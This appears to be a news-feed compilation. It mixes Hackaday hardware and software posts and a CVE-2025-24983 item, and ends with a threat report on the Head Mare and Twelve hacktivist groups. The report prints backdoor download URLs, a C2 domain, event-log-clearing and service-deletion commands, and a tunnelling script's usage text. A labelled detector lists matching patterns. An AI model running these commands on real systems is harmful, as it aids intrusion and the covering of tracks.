The Cybersecurity and Infrastructure Security Agency (CISA) has added two new vulnerabilities to its Known Exploited Vulnerabilities catalog, one of which is CVE-2025-24983, which is being actively exploited by attackers. The CSIRT of Italy’s National Cybersecurity Agency (ACN) did the same with a dedicated bulletin that also covers this CVE.

According to cybersecurity firm ESET, which discovered and reported the vulnerability, attackers have been exploiting this flaw in the wild since March 2023, making it one of the longest-running active exploits before a fix was released.

The security bug is in the Windows Win32 kernel subsystem and has been classified as a use-after-free (UAF) weakness that allows attackers with low privileges to elevate them to SYSTEM without requiring user interaction.

Despite its significant impact, Microsoft rated the vulnerability as “Important” rather than “Critical” because of the high exploitation complexity, which requires attackers to win a race condition.

“The vulnerability is a use-after-free type of vulnerability in the Win32k driver,” ESET explained in its technical analysis. “In a certain scenario achieved using the WaitForInputIdle API, the W32PROCESS structure is dereferenced one more time than it should be, causing the UAF.”

ESET researcher Filip Jurčacko, who discovered the exploit, found that it was being distributed via a sophisticated backdoor known as PipeMagic.

The article “A Windows Privilege Escalation Exploited for 2 Years Fixed in Patch Tuesday. CISA and ACN Urge Updating” comes from the cybersecurity blog.


The Mysterious and Important Work of Prop Design on Severance


Have you seen Severance? Chances are good that you have; the TV series has become wildly popular in its second season, to the point where the fandom’s dedication is difficult to distinguish from the in-universe cult of [Kier]. Part of the show’s appeal comes from its overall aesthetic, which is captured in this description of the building of one of the show’s props.

A detailed recap of the show is impossible, but for the uninitiated, a mega-corporation called Lumon has developed a chip that certain workers have implanted in their brains to sever their personalities and memories into work and non-work halves. The working “Innies” have no memory of what their “Outies” do when they aren’t at work, which sounds a lot better than it actually ends up being. It’s as weird as it sounds, and then some.

The prop featured here is the “WoeMeter” from episode seven of season two, used to quantify the amount of woe in a severed worker — told you it was weird. The prop was built by design house [make3] on a short timeline and after seeing only some sketches and rough renders from the production designers, and had to echo the not-quite-midcentury modern look of the whole series. The builders took inspiration from, among other things, a classic Nagra tape recorder, going so far as to harvest its knobs and switches to use in the build. The controls are all functional and laid out in a sensible way, allowing the actors to use the device in a convincing way. For visual feedback, the prop has two servo-operated meters and a string of seven-segment LED displays, all controlled by an ESP-32 mounted to a custom PCB. Adding the Lumon logo to the silkscreen was a nice touch.

The prop maker’s art is fascinating, and the ability to let your imagination run wild while making something that looks good and works for the production has got to be a blast. [make3] really nailed it with this one.

Thanks to [Aaron’s Outie] for the tip.


hackaday.com/2025/03/13/the-my…


Tracking Deep-Sky Objects


Astrophotography, and astronomy in general, takes some fairly specialized tools and a high amount of precision. Setting up the equipment can also take a lot of time, especially for amateurs traveling to various locations with their equipment, so anything that can reduce the amount of time spent looking for objects and increasing the amount of time looking at them is a welcome addition, especially since nights where conditions are ideal for these activities can be rare. [Anton] developed this real-time tracking tool for deep sky objects (DSOs) to keep tabs on most of the interesting things out there a telescope can be pointed at.

[Anton] calls his tool the Nova DSO Altitude Tracker and gets its information from SIMBAD, updating every minute for a given location on the planet. With that location data, the program calculates altitude and azimuth for various objects and also helps the user keep track of other important variables like moon illumination and angle above the horizon. It also allows the user to highlight specific objects of interest, making sure they are front and center throughout the session. Each DSO can be selected from a list to display detailed information about it such as its path, time visible in the sky, and other properties.

To get the program running, essentially all that’s required is a computer capable of running Python and a display of some sort. From there it provides a quick view of the best objects to point one’s telescope or camera at without any guesswork. With all of the code available it shouldn’t be too much of a leap to do other things with the underlying software, either, such as tying it into a tracker of some sort like this DIY telescope tracking device we featured a while back.


hackaday.com/2025/03/13/tracki…


BritCSS: Write CSS With British English Spellings


Everyone knows that there is only one proper English, with the rest being mere derivatives that bastardize the spelling and grammar. Despite this, the hoodlums who staged a violent uprising against British rule in the American colonies have somehow made their uncouth dialect dominant in the information technologies that have taken the world by storm these past decades. In this urgent mission to restore the King’s English to its rightful place, we fortunately have patriotic British citizens who have taken it upon themselves to correct this grave injustice. Brave citizens such as [Declan Chidlow], whose BritCSS project is a bright beacon in these harrowing times.

Implemented as a simple, 14 kB JavaScript script to be included in an HTML page, it allows one to write CSS files using proper spelling, such as background-colour and centre. Meanwhile harsh language such as !important is replaced with the more pleasant !if-you-would-be-so-kind. It is expected that although for now this script has to be included on each page to use BritCSS, native support will soon be implemented in every browser, superseding the US dialect version. [Declan] has also been recommended to be awarded the Order of the British Empire for his outstanding services.


hackaday.com/2025/03/13/britcs…


Have Li-ion Batteries Gone Too Far?


The proliferation of affordable lithium batteries has made modern life convenient in a way we could only imagine in the 80s when everything was powered by squadrons of AAs, or has it? [Ian Bogost] ponders whether sticking a lithium in every new device is really the best idea.

There’s no doubt that for some applications, lithium-based chemistries are a critically-enabling technology. NiMH-based EVs of the 1990s suffered short range and slow recharge times which made them only useful as commuter cars, but is a flashlight really better with lithium than with a replaceable cell? When household electronics are treated as disposable, and Right to Repair is only a glimmer in the eye of some legislators, a worn-out cell in a rarely-used device might destine it to the trash bin, especially for the less technically inclined.

[Bogost] decries “the misconception that rechargeables are always better,” although we wonder why his article completely fails to mention the existence of rechargeable NiMH AAs and AAAs which are loads better than their forebears in the 90s. Perhaps even more relevantly, standardized pouch and cylindrical lithium cells are available like the venerable 18650 which we know many makers prefer due to their easy-to-obtain nature. Regardless, we can certainly agree with the author that easy to source and replace batteries are few and far between in many consumer electronics these days. Perhaps new EU regulations will help?

Once you’ve selected a battery for your project, don’t forget to manage it if it’s a Li-ion cell. With great power density, comes great responsibility.


hackaday.com/2025/03/13/have-l…


Got Junk? Then Build This Scrappy TEA Laser


A piece of glass, some bits of tinfoil, a sheet of plastic, a couple of razor blades, and a few assorted bits and bobs are all it takes to build this TEA nitrogen laser. Oh, and a 5,000-volt flyback supply with enough amperage to stop your heart. You’ll need that too.

Seriously, if you choose to follow [MultiverseCurator]’s example and build this laser, you’ll want to take the proper precautions. A transversely excited atmospheric laser is simple in concept, but there are plenty of ways for them to go wrong. Unlike the gas lasers used in laser cutters, there’s no enclosed resonator cavity or mirrors. Rather, the excitation takes place across a narrow gap between two electrodes, using atmospheric nitrogen as the lasing medium. This results in hard UV emissions, which means you can’t see them with the naked eye. Add to that the spark gap creating extremely loud discharges as the laser operates, and hazards abound. Proceed with caution.

Construction starts with a flat glass plate and a pair of large capacitors made from aluminum foil plates separated by a plastic dielectric. The razor blades are connected across the capacitors, separated by a narrow gap, with an inductor made from magnet wire in parallel. A spark gap made from nuts and bolts goes in series, and the whole assembly gets connected to a high-voltage power supply — [Multiverse] used a ZVS driver and a CRT flyback transformer with an eight-megohm resistor in series. The video below has all the build details.

It’ll take a little fiddling to get it lasing, and you’ll need something phosphorescent to see the UV light — a scrap of copy paper should do. But the results are pretty amazing for something made from scrap. If you want to take the design to the next level, you’ll want to check out [Les Wright]’s TEA laser build.

youtube.com/embed/uLyVpYIYT1E?…


hackaday.com/2025/03/13/got-ju…


Linux Fu: Use the Source (Command), Luke


You can argue if bash is a good programming language or not, but you can’t argue that it is a programming language. However, there are a few oddities about it that make it different from most other languages you probably know. For one thing, variables are dynamically scoped. Second, you can easily change variables in an upper scope. This leads to a problem when you want to do something like reset your path:
#!/bin/bash
#: This does NOT work
PATH=/usr/bin:/bin

Well, actually, it does work; it just doesn’t work the way you imagine it might. The key is to realize that when you execute our script (say, resetpath), a new copy of bash runs. It inherits all the variables from your shell. Now the script sets PATH for the new copy of bash. Anything else you run in that script will see your change. But when the script exits, the new copy of bash is gone and the old copy sees the same old PATH it always did.

Sometimes, this is a benefit, similar to “call by value” in other languages. However, what if you want to influence things? What’s more, the situation is just the opposite within bash functions. For example:
#!/bin/bash

b() {
    echo B: $x
    x=200
}

a() {
    x=100
    b
    echo A: $x
}

a
#: output
#: B: 100
#: A: 200

Function b has no difficulty reading and even setting variable x.

The Answer, Of Source Course


The answer to the first problem is to use the source command (which can be either the word source or a single period). This tells bash to avoid running a new interpreter and just pretend you’d entered all the lines in a file from the console.

This is great sometimes. Our resetpath script will actually work just fine with either of these commands:
source resetpath
. resetpath

You don’t even need the #! line, although it doesn’t hurt. However, there are a few problems.
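As an added illustration (not part of the article), here is the child-process-versus-source difference run in code. A throwaway script reassigns DEMO_PATH, a stand-in for PATH chosen so the demo cannot break the shell running it; the file name and the variable are constructed for this example.

```shell
#!/bin/bash
# Added example (not from the article): the same one-line script executed
# as a child process and then sourced, to show which one changes the caller.

# Write a throwaway script that reassigns DEMO_PATH. Constructed for the demo.
demo_write_script() {
    local f
    f=$(mktemp) || return 1
    printf '%s\n' '#!/bin/bash' 'DEMO_PATH=/usr/bin:/bin' > "$f"
    printf '%s\n' "$f"
}

# Execute the script: a new bash inherits the exported DEMO_PATH (as it would
# PATH), changes its own copy, and exits. The caller still sees the old value.
demo_run_as_child() {
    local f
    f=$(demo_write_script) || return 1
    export DEMO_PATH=/home/me/bin:/usr/bin:/bin
    bash "$f"
    rm -f "$f"
    printf '%s\n' "$DEMO_PATH"    # /home/me/bin:/usr/bin:/bin
}

# Source the script: its lines run in this shell, so the assignment sticks.
demo_run_sourced() {
    local f
    f=$(demo_write_script) || return 1
    export DEMO_PATH=/home/me/bin:/usr/bin:/bin
    . "$f"
    rm -f "$f"
    printf '%s\n' "$DEMO_PATH"    # /usr/bin:/bin
}
```

Both helpers print DEMO_PATH after the script has had its chance to change it; only the sourced run shows the new value.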

The Catches


First, if you exit, then you exit the entire shell, not something you probably meant to do. Second, you wind up polluting the variable space of the parent. For example, if your script creates a function X, with a regular shell script, that function goes away as soon as your script stops. With a source script, function X now will live forever unless you do something about it.

Neither of these problems is insurmountable, of course, and you’ll see a few ways to address them in the example code in this post.

A Simple Example


If you spend a lot of time on the command line, you might want to have shortcut names for directories. What’s more, you might want to execute a little script when you go to particular directories or even when you leave them.

My plan is to keep a simple file in ~/.proj_dirs. To keep things simple, I’m assuming you can figure out the bash format:
PROJ_DIRS["docs"]="~/library/documents"
PROJ_DIRS["video"]="~/library/videos"
PROJ_DIRS["arduino"]="/home/alw/projects/embedded/Arduino"
. . .
The eventual goal is to replace the cd command (or, at least, allow for that). However, it would be a pain to have to write something like “source pcd arduino” every time.

The Alias Solution


The answer is pretty simple. You can create a script that can install itself as an alias. Here’s the basic flow:
#!/bin/bash
#: This is not a bash shell script
#: But needs to be sourced. However...
#: Try:
#: eval $(__project_dir.sh --__install project_dir)
if [ "$1" == "--__install" ] # this should only be called from "real" script
then
    aname="$2"
    if [ "$aname" == "" ]
    then
        aname="pcd"
    fi
    echo -n "alias '$aname'='source "
    aname=$(realpath -s "$0")
    echo "$aname'"
    exit 0
fi
#: Your source script goes here
...

The idea is that if you run as a regular script with --__install, it returns the alias command. You can then eval that in, for example, a startup script (like .bashrc or .profile), and then you’ll have the alias you want. By default, the code uses pcd, although you can set up any name you like on the command line. You could even create an alias for cd if you wanted to do that.

Why Not Automatic?


You could, of course, detect if you were running normally or as a source automatically. Turns out this is somewhat finicky across shells, although if you are sure you are always using real bash, it is feasible. For example:
if [[ "${BASH_SOURCE[0]}" == "$0" ]]
then
    echo I am not sourced!
fi

Variables


Once you have the basic framework, it is easy to write the scripts to read the “database” (also using source) and do the actual work. However, there is a slight problem. Once you produce all the variables you need to do the work, it leaves all that pollution in your shell’s namespace.

Of course, you could write a function to clean up everything you use, but that’s a pain and error prone, too. A better idea is to write your code in a bash function. Then you can use local variables that will go away when the function returns. That leaves you with just your function to clear up with unset.

That leads to this simple framework:
#!/bin/bash
if [[ "${BASH_SOURCE[0]}" == "$0" ]]
then
    if [ "$1" == "--__install" ] # this should only be called from "real" script
    then
        aname="$2"
        if [ "$aname" == "" ]
        then
            aname="pcd" # default alias name
        fi
        echo -n "alias '$aname'='source "
        aname=$(realpath -s "$0")
        echo "$aname'"
        exit 0
    fi
    echo "You must source this script"
    exit 1
fi

#: Ok your script goes here

main() {
    . . .

}

#: Be sure to have this at the end
#: Actually named with underscores in the real code
#: But that upsets the rendering in browser
#: Actual code at gist.github.com/wd5gnr/c5681f2…
go() {
    local tmprv
    main "$@"
    tmprv=$?
    unset -f main go   # -f removes the functions; a plain "unset main, go" would not
    return $tmprv
}

go "$@"
return $?
The very bottom calls the go function, which calls your main function. Then the go function destroys your main function and itself. If you create new functions that you don’t want to keep around, you’ll need to destroy them yourself. Besides, you might be creating functions you want to keep, so the framework can’t decide.
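The framework above, filled in as an added, stand-alone example (this is not the article’s gist): sourced-versus-executed detection, an --__install mode that prints the alias, the real work in a function with local variables, and a wrapper that removes every function it defined. Two assumptions differ from the article: the directory table is a file of tab-separated name and path lines (simpler than the bash associative array shown earlier), and the function names carry a pcd_ prefix so they can be unset together.

```shell
#!/bin/bash
# Added example, not the article's gist: the framework filled in as a small
# "project cd". Assumptions: the table is a file of "name<TAB>path" lines,
# and every function is prefixed pcd_ so the cleanup can name them all.

PCD_TABLE="${PCD_TABLE:-$HOME/.proj_dirs}"

# True when this file is being sourced. ${BASH_SOURCE:-$0} is element 0 of
# BASH_SOURCE in bash and falls back to $0 in other shells.
pcd_is_sourced() {
    [ "${BASH_SOURCE:-$0}" != "$0" ]
}

# Print the alias line that .bashrc will eval, e.g. alias pcd='. /path/pcd.sh'
pcd_install_alias() {
    printf "alias %s='. %s'\n" "${1:-pcd}" "$2"
}

# Resolve a short name through the table. An unknown name (or a missing
# table) returns the argument unchanged, so ordinary paths still work.
pcd_resolve() {
    local name="$1" key path tab
    tab=$(printf '\t')
    if [ -r "$PCD_TABLE" ]; then
        while IFS="$tab" read -r key path; do
            if [ "$key" = "$name" ]; then
                printf '%s\n' "$path"
                return 0
            fi
        done < "$PCD_TABLE"
    fi
    printf '%s\n' "$name"
}

# The real work: run the optional exit hook, change directory, run the
# optional enter hook. Hooks are sourced, so they only need to be readable.
pcd_main() {
    local target
    target=$(pcd_resolve "$1") || return 1
    if [ -r "$PWD/.dir_exit" ]; then . "$PWD/.dir_exit"; fi
    cd "$target" || return 1
    if [ -r "$PWD/.dir_enter" ]; then . "$PWD/.dir_enter"; fi
    return 0
}

# Wrapper: run main, then remove every function this file defined so the
# caller's namespace is left exactly as it was found.
pcd_go() {
    local rv
    pcd_main "$@"
    rv=$?
    unset -f pcd_main pcd_resolve pcd_is_sourced pcd_install_alias pcd_dispatch pcd_go
    return $rv
}

# Entry point: when executed rather than sourced, only --__install is useful.
pcd_dispatch() {
    if ! pcd_is_sourced; then
        if [ "$1" = "--__install" ]; then
            pcd_install_alias "$2" "$(cd "$(dirname "$0")" && pwd)/$(basename "$0")"
            return 0
        fi
        echo "You must source this script" >&2
        return 1
    fi
    pcd_go "$@"
}

# The last line of the real script would be:  pcd_dispatch "$@"
```

Installing it is the same eval trick as in the article: eval "$(/path/to/pcd.sh --__install pcd)" in .bashrc, after which pcd docs sources the file, changes directory, and leaves no pcd_ functions behind. The dispatch call is kept in a comment so the file can also be sourced for inspection without running anything.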

The Whole Thing


You can find the entire example on GitHub. Outside of the management of the alias and the variable scope, the script is unremarkable. Note the optional scripts in the directories (.dir_enter and .dir_exit) are sourced also, so they only need to be readable (-r) not executable (-x).

The only other nuance is that if you enter anything as a directory that the program doesn’t recognize, it assumes it is an actual directory, so you can use this to replace the cd command entirely if you want.

Since the script can tell if it is sourced or not, it is possible to start in the source mode and then call yourself as a normal script to do work where that makes more sense. As usual with bash, there are lots of possibilities.

We talk about bash programming a lot around here. Debugging can be helpful, although they haven’t packaged the debugger for newer versions of bash lately.


hackaday.com/2025/03/13/linux-…


Hacking a Rotary Phone


[Yaymukund] made an interesting observation. Old-style rotary phones were made to last and made for service. Why? Because you didn’t own them, the phone company did. There was no advantage for them for you to need a service call or a new phone. Of course, many of these old phones are still hanging around like the GPO 746 that appears in the post.

What do you do with an old rotary phone? In this case, you make it play a random tune whenever someone picks up the handset. As you might expect, you don’t need much of the original phone to do this. In particular, you need the handset receiver and the switch hook. We’d have liked to read the dial to select a tune, but perhaps that could be in version two.

All the components wire back to a D92732 circuit board. Finding the right wires was a bit finicky, but eventually, a Teensy, a battery pack, and an audio breakout board were in place. The rest is mostly trivial.

[Yaymukund] spent about £300, but over half of that was on tools most Hackaday readers will already have. The phone itself was £65. You can use these phones as a basis for many projects. Even if you want to go mobile.


hackaday.com/2025/03/13/hackin…


Hackaday Europe 2025: Speaker Schedule and Official Event Page


Hackaday Europe 2025 is just days away, and we’ve got the finalized speaker schedule hot off the digital press. We’re also pleased to announce that the event page is now officially live, where you can find all the vital information about the weekend’s festivities in one place.

Whether you’ll be joining the fun in Berlin, or watching the live stream from home, we’ve got a fantastic lineup of speakers this year who are eager to tell us all about the projects that have been keeping them up at night recently:

Saturday Schedule


9:00 – 10:00: Registration and Breakfast
10:00 – 10:20: Opening Remarks
10:30 – 11:20: What if the Future [of Electronics] was Compostable? (Keynote), David Cuartielles
11:30 – 11:50: Manufacturing the Hackaday Supercon Badge, Giovanni Salinas
12:00 – 12:20: Seeing Through Silicon with IRIS (InfraRed, in-situ) Imaging, Bunnie Huang
12:30 – 13:30: Lunch
13:30 – 13:50: Developing a NFC Based Decentralized Payment System, Daniel Büchele & Andre Zibell
14:00 – 14:40: Hacking a Pinball Machine, Daniel Dakhno
14:50 – 15:30: Hardware Startup / Product Pitfalls, Sera Evcimen
15:40 – 16:00: Creating Light Sculptures for Fun and…Mostly for Fun, Erik Bosman
16:10 – 16:50: The Core64 – NeonPixels – 65uino Collaboration, Geppert, Freyermuth, & Nielsen
17:00 – 17:20: Make PCBs Bend Over Backwards for You: How to Design Flexible PCBs, Rehana Al-Soltane
17:30 – 18:10: More Than Motors: Decoding the Software Behind Pen Plotters and CNC Devices, Francis Stokes
18:20 – 18:40: Half-size Hacking – 0.05in Matrix Boards Under the Microscope, Alun Morris
18:40 – 20:00: Dinner
20:00 – 20:40: HEU1993 to WHY2025: Dutch Hacker Camps from the Past and the Future, Christel Sanders
20:50 – 21:30: Vectors, Pixels, Plotters and Public Participation, Niklas Roy
21:30 – 22:00: Live Performance, Rich Hogben & Aleksandar Bradic
22:00 – 24:00: Badge Hacking Ceremony

Time Has Run Out!


Tickets sold out a few days ago, so if you’ve got one we’ll see you soon, and if not, we will be streaming all of the Saturday talks live, so hit up Hackaday on the weekend and you can play along, at least virtually. And for back-channel chat, join us on the Hackaday Discord #europe-2025 channel.


hackaday.com/2025/03/13/hackad…


100 Days with a Mechanical Heart! Is the Future of Transplants Already Here?


Australian company BiVACOR has reached an important milestone in its development work: a patient lived for more than 100 days with the mechanical heart it created, after which he successfully received a donor organ transplant. The name of the man, who needed a transplant because of a serious illness, has not been disclosed.

The system, called the Total Artificial Heart (TAH), is an innovative blood-circulation mechanism. The design is based on an electromechanical pump with a single moving part, a rotor, which is held in position by magnetic levitation. The device’s main advantage is its ability to direct blood flow to both the body and the lungs at the same time.

The engineers radically changed the traditional approach to the problem. Earlier models contained many moving parts that gradually wore out through contact with one another. In the new model, the rotor, which resembles a special impeller in shape, literally floats without touching any other part.

The company has even presented an animated 3D model of the mechanism that clearly demonstrates how it works. You can watch it here.

The implant is powered by an external power system. The controller and batteries are connected to the device through a transcutaneous cable, a special wire that passes through a small incision in the patient’s body.

Last year, BiVACOR conducted its first study in the United States, on five patients who received a TAH as a temporary measure while awaiting a donor heart. All participants underwent the surgery successfully and were discharged from hospital some time later. The fate of two of them is known: one received a donor heart 27 days after the TAH was implanted, the other eight days later.

The operation on the Australian patient lasted six hours. After recovery, doctors allowed the man to leave the clinic. For more than three months he led a normal life with the implant, until the opportunity for a transplant arose.

The problem of heart disease remains extremely acute, and the number of donor organs available for transplant is catastrophically small. BiVACOR’s specialists intend to improve their invention so that it can work for up to ten years, roughly the same period as a real transplanted heart.

However, doctors warn that despite the encouraging results, the development is still in the clinical trial phase. Only 15 more TAH procedures have been approved in the United States. Years of research will be needed before the technology is approved for widespread use, either as temporary support for patients on the waiting list or as a permanent measure.

The article “100 Days with a Mechanical Heart! Is the Future of Transplants Already Here?” comes from the cybersecurity blog.


High-Speed Reservoir Computing With Integrated Laser Graded Artificial Neurons


So-called neuromorphic computing involves the use of physical artificial neurons to do computing in a way that is inspired by the human brain. With photonic neuromorphic computing these artificial neurons generally use laser sources and structures such as micro-ring resonators and resonant tunneling diodes to inject photons and modulate them akin to biological neurons.
General reservoir computing with laser graded neuron. (Credit: Yikun Nie et al., 2024, Optica)
One limitation of photonic artificial neurons was that these have a binary response and a refractory period, making them unlike the more versatile graded neurons. This has now been addressed by [Yikun Nie] et al. with their research published in Optica.

The main advantage of graded neurons is that they are capable of analog graded responses, combined with no refractory period in which the neuron is unresponsive. For the photonic version, a quantum dot (QD) based gain section was constructed, with the input pulses determining the (analog) output.

Multiple of these neurons were then combined on a single die, for use in a reservoir computing configuration. This was used with a range of tests, including arrhythmia detection (98% accuracy) and handwriting classification (92% accuracy). By having the lasers integrated and the input pulses being electrical in nature, this should make it quite low-power, as well as fast, featuring 100 GHz QD lasers.


hackaday.com/2025/03/13/high-s…


Head Mare and Twelve join forces to attack Russian entities



Introduction


In September 2024, a series of attacks targeted Russian companies, revealing indicators of compromise and tactics associated with two hacktivist groups: Head Mare and Twelve. Our investigation showed that Head Mare relied heavily on tools previously associated with Twelve. Additionally, Head Mare attacks utilized command-and-control (C2) servers exclusively linked to Twelve prior to these incidents. This suggests potential collaboration and joint campaigns between the two groups.

The attackers continue to refine their methods, employing both familiar tools from past Head Mare incidents and new PowerShell-based tools.

This report analyzes the software and techniques observed in recent Head Mare attacks and how these overlap with Twelve’s activities. The focus is on Head Mare’s TTPs and their evolution, with notes on commonalities with Twelve’s TTPs.

Technical details

Head Mare’s toolkit


The attackers used various publicly available tools, including open-source software and leaked proprietary tools, to achieve their goals.

  • mimikatz;
  • ADRecon;
  • secretsdump;
  • ProcDump;
  • Localtonet;
  • revsocks;
  • ngrok;
  • cloudflared;
  • Gost;
  • fscan;
  • SoftPerfect Network Scanner;
  • mRemoteNG;
  • PSExec;
  • smbexec;
  • wmiexec;
  • LockBit 3.0;
  • Babuk.

Some of these tools were mentioned in our previous report on Head Mare, while others were new to their arsenal.

Notable new tools


Among the tools used by Head Mare were some not previously employed by the hacktivists but seen in attacks by other groups. For instance, they used the CobInt backdoor for remote access to domain controllers, previously observed only in Twelve’s attacks on Russian companies. This is notable, as it suggests that Twelve and Head Mare may be sharing tools.

In addition to CobInt, the attackers used their own PhantomJitter backdoor, installed on servers for remote command execution. This tool appeared in the group’s arsenal in August 2024. We described its modus operandi in a story accessible to the subscribers of our Threat Intelligence reports.

Another new tactic involved a tool for remote command execution on a business automation platform server. Thus, the attackers used both proven and new tools, demonstrating flexibility and adaptability.

Initial Access


While previous Head Mare attacks relied solely on phishing emails with malicious attachments, they now also infiltrate victims’ infrastructure through compromised contractors with access to business automation platforms and RDP connections. This confirms the trend of hacktivists exploiting trusted relationships (T1199 – Trusted Relationship and T1078 – Valid Accounts).

The attackers also exploited software vulnerabilities, most commonly CVE-2023-38831 in WinRAR through phishing emails. In one incident, they exploited the Microsoft Exchange server vulnerability CVE-2021-26855 (ProxyLogon). Although patched in 2021, this vulnerability is still exploitable due to organizations using outdated operating systems and software. Our telemetry data revealed domain controllers still running Microsoft Windows Server 2012 R2 Server Standard x64 or, as in the aforementioned incidents, Microsoft Exchange Server 2016 used for email.

The attackers used ProxyLogon to execute a command to download and launch CobInt on the server.

Persistence


The method of establishing persistence has changed. Instead of creating scheduled tasks, the attackers now create new privileged local users on a business automation platform server. They use these accounts to connect to the server via RDP to transfer and execute tools interactively.

They also install traffic tunneling tools like Localtonet for persistent access to the target host. They made Localtonet persistent with the help of Non-Sucking Service Manager (NSSM), which allows running any application as a Windows service, as well as monitoring and restarting it if it fails for some reason. This user-friendly tool is often used legitimately to install and manage programs that cannot function as services. Localtonet and NSSM help the malicious actor to maintain continuous access to the infected host.

Anti-detection techniques


Head Mare continued to use the Masquerading technique (T1655), naming utility executables like standard operating system files. The investigation found files such as:

Software and the path under which it was found on the system:

  • rclone (cloud storage sync tool): C:\ProgramData\wusa.exe
  • PhantomJitter: C:\Windows\System32\inetsrv\calc.exe
  • cloudflared: C:\Windows\System32\winuac.exe
  • Gost: C:\Windows\System32\winsw.exe

In one incident, cmd.exe was renamed to log.exe and launched from C:\Users\[username]\log.exe.

Besides renaming files, the attackers also removed services and files they had created and cleared event logs to evade detection. Relevant artifacts were found in the PowerShell command history on attacked machines:
stop-service -name <servicename>
remove-service -name <servicename>
remove-service -name "<servicename>"
sc stop <servicename>
sc delete <servicename>
Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }
The ransomware executable also cleared system logs, as evidenced by a flag in the configuration of the samples that we have analyzed.
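The masquerading table and the history commands above translate directly into host-level checks. Below is an added example in Python, not code from the Securelist report, that flags well-known Windows binary names found outside their canonical directory, the winsw/winuac/winsws names the report ties to the tunnelling tools, and renamed binaries whose OriginalFileName (as Sysmon event 1 or PE version info reports it) still says cmd.exe; a second function sweeps PowerShell history for the service-removal and Clear-EventLog commands quoted above. The canonical-directory table, the file inventory and the history lines are constructed for the example.

```python
"""Masquerading and log-clearing checks for the artifacts described above.

Added example, not code from the Securelist report. The canonical directory
table, the file inventory and the PowerShell history lines are constructed;
"original_filename" stands for the OriginalFileName value that Sysmon
event 1 or PE version info provides.
"""
import re
from pathlib import PureWindowsPath
from typing import List, Optional, Tuple

# Directories in which these Windows binaries legitimately live on a default
# install (assumption: WinSxS component-store copies are out of scope).
CANONICAL_DIRS = {
    "calc.exe": {r"c:\windows\system32", r"c:\windows\syswow64"},
    "cmd.exe": {r"c:\windows\system32", r"c:\windows\syswow64"},
    "wusa.exe": {r"c:\windows\system32", r"c:\windows\syswow64"},
}

# Service-like names the report ties to cloudflared, Gost and its wrapper;
# none of them is a real Windows component.
ROGUE_NAMES = {"winuac.exe", "winsw.exe", "winsws.exe"}


def check_file(path: str, original_filename: Optional[str] = None) -> Optional[str]:
    """Return a reason if the file looks like a masqueraded tool, else None."""
    p = PureWindowsPath(path)
    name = p.name.lower()
    parent = str(p.parent).lower()
    if name in ROGUE_NAMES:
        return f"known rogue name {name} at {path}"
    if name in CANONICAL_DIRS and parent not in CANONICAL_DIRS[name]:
        return f"OS binary name {name} outside its canonical directory: {path}"
    if original_filename:
        orig = original_filename.lower()
        if orig != name and orig in CANONICAL_DIRS:
            return f"renamed OS binary: {path} carries OriginalFileName {original_filename}"
    return None


# Commands from the report's PowerShell history that remove tooling or wipe logs.
EVASION_PATTERNS = [
    (re.compile(r"\bclear-eventlog\b", re.I), "event logs cleared via Clear-EventLog"),
    (re.compile(r"\bremove-service\b", re.I), "service removed via Remove-Service"),
    (re.compile(r"\bsc(?:\.exe)?\s+delete\b", re.I), "service deleted via sc.exe"),
]


def scan_history(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Return (line number, reason, command) for every matching history entry."""
    hits = []
    for number, line in enumerate(lines, start=1):
        for pattern, reason in EVASION_PATTERNS:
            if pattern.search(line):
                hits.append((number, reason, line.strip()))
                break
    return hits


# Constructed inventory: (path, OriginalFileName) as an EDR would report them.
SAMPLE_FILES = [
    (r"C:\Windows\System32\calc.exe", "CALC.EXE"),        # legitimate copy
    (r"C:\Windows\System32\inetsrv\calc.exe", None),     # PhantomJitter drop location
    (r"C:\ProgramData\wusa.exe", "rclone.exe"),          # rclone posing as wusa.exe
    (r"C:\Users\alice\log.exe", "Cmd.Exe"),              # cmd.exe renamed to log.exe
    (r"C:\Windows\System32\winuac.exe", None),           # cloudflared
]

# Constructed PowerShell history mirroring the commands quoted above.
SAMPLE_HISTORY = [
    "Get-Process",
    "stop-service -name winsw",
    "remove-service -name winsw",
    "sc delete winuac",
    "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }",
]

if __name__ == "__main__":
    for path, orig in SAMPLE_FILES:
        print(check_file(path, orig) or f"ok: {path}")
    for hit in scan_history(SAMPLE_HISTORY):
        print(hit)
```

The OriginalFileName comparison is what catches the cmd.exe-renamed-to-log.exe case, which a path allowlist alone cannot see; in production the inventory would come from EDR or Sysmon telemetry rather than a hard-coded list.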

Command and Control


After exploiting the business automation platform server, attackers downloaded and installed the PhantomJitter backdoor. In the incidents we observed, the backdoor was downloaded into the victims’ infrastructure from the following URLs:
http[:]//45.87.246[.]34:443/calc.exe
http[:]//185.158.248[.]107:443/calc.exe
The file was saved in the local directory as c.exe. Upon launch, it connected to the C2 server, allowing the operator to execute commands on the compromised host.

In addition to PhantomJitter, the attackers used CobInt, whose payload connected to the following C2 server:
360nvidia[.]com
The domain resolves to the IP address 45.156.27[.]115.

Pivoting


The group expanded its arsenal to achieve their objectives at this stage. To gain remote access to the compromised infrastructure, they used a custom PowerShell script named proxy.ps1 to install and configure cloudflared and Gost.

Gost is a lightweight, powerful proxy utility offering various network routing and traffic hiding capabilities. It supports multiple protocols and can create secure communication channels, bypass blocks, and establish tunnels.

Cloudflared tunnels traffic through the Cloudflare network. It establishes a secure connection to an attacker-controlled Cloudflare server, acting as a proxy for C2 communication. This bypasses network restrictions like NAT (Network Address Translation) and firewall rules that might hinder direct connections between the victim host and attacker servers.

The proxy.ps1 script can also download archives from URLs specified on a command line and extract them to a temporary folder. Below is the help output for the script:
Usage: .\proxy.ps1 -r https://<site>.com/archive.zip -p gost_port -t cloudflared_token

Parameters:
-l Extract archive locally.
-r Download and extract archive remotely.
-p Specify the port for the gost.
-t Specify the token for the cloudflared.
-u Uninstall gost & cloudflared.
-h Show this help message.
The script defines constants for filenames, installing cloudflared and Gost with names mimicking standard Windows services in the C:\Windows\System32 folder. The script uses the GetTempFileName function to obtain temporary file paths.
$archivePath = "win.zip"
$filesPath = "C:\Windows\System32"
$cloudflaredPath = Join-Path -Path $filesPath -ChildPath "winuac.exe"
$gostPath = Join-Path -Path $filesPath -ChildPath "winsw.exe"
$winswPath = Join-Path -Path $filesPath -ChildPath "winsws.exe"
$winswxmlPath = Join-Path -Path $filesPath -ChildPath "winsws.xml"
$tempFile = [System.IO.Path]::GetTempFileName()
